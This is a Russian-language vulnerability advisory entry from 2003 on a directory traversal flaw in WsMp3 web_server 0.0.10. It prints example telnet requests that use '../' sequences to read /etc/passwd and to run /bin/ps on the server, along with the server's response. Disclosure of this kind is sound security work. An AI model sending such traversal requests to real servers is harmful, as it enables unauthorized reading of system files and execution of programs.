Дата публикации: | 26.05.2003 |
Всего просмотров: | 1095 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обхода каталога обнаружена в 'WsMp3 web_server'. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может выполнять произвольные программы на системе.
Сообщается, что удаленный пользователь может представить специально обработанный HTTP GET запрос, содержащий последовательность '../', чтобы просматривать произвольные файлы на системе с привилегиями Web демона. Пример: bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. GET /dir/../../../../../../etc/passwd HTTP/1.0также сообщается, что удаленный пользователь может представить специально обработанный HTTP POST запрос, чтобы выполнить произвольные программы на системе. Пример: bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. POST /dir/../../../../../../bin/ps HTTP/1.0 HTTP/1.1 200 OK Connection: close Content-Type: text/html Date: Sat May 03 01:25:28 2003 Last-Modified: Sat May 03 01:25:28 2003 Content-Length: 201 PID TTY TIME CMD 29529 pts/2 00:00:00 login 29559 pts/2 00:00:00 su 29560 pts/2 00:00:00 bash 29681 pts/2 00:00:10 WsMp3 29730 pts/2 00:00:00 WsMp3 29731 pts/2 00:00:00 psУязвимость обнаружена в WsMp3 web_server 0.0.10 |
Ссылки: | WsMP3d Directory Traversing Vulnerability |